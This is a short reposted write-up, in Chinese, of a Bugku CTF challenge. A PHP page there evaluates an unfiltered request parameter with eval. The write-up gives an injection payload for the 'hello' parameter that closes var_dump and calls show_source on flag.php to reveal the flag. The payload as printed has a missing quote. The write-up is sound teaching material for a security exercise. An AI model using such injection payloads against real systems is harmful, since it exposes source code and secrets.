Bugku_CTF Writeup 之 文件包含(60)
Posted izayoi
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Bugku_CTF Writeup 之 文件包含(60)相关的知识,希望对你有一定的参考价值。
题目说明:
1. 打开页面发现给出了php源码
1 <?php 2 include "flag.php"; 3 $a = @$_REQUEST[‘hello‘]; 4 eval( "var_dump($a);"); 5 show_source(__FILE__); 6 ?>
2.flag应该在flag.php里,想办法将其爆出
(1)a变量由$_REQUEST变量获取,可以用GET或POST方法为hello赋值进而为$a赋值
(2)程序并未对hello的输入进行判断过滤
(3)eval函数中执行的命令进而可以被$a的值所决定
3.类似于构造SQL注入语句,构造hello的值为 1);show_source("flag.php);var_dump(1
GET方法传参后,eval函数实际执行的命令是 var_dump(1);show_source("flag.php");var_dump(1);
即可得到flag.php的源码并得到flag
以上是关于Bugku_CTF Writeup 之 文件包含(60)的主要内容,如果未能解决你的问题,请参考以下文章
Bugku_CTF Writeup 之 管理员系统 (60)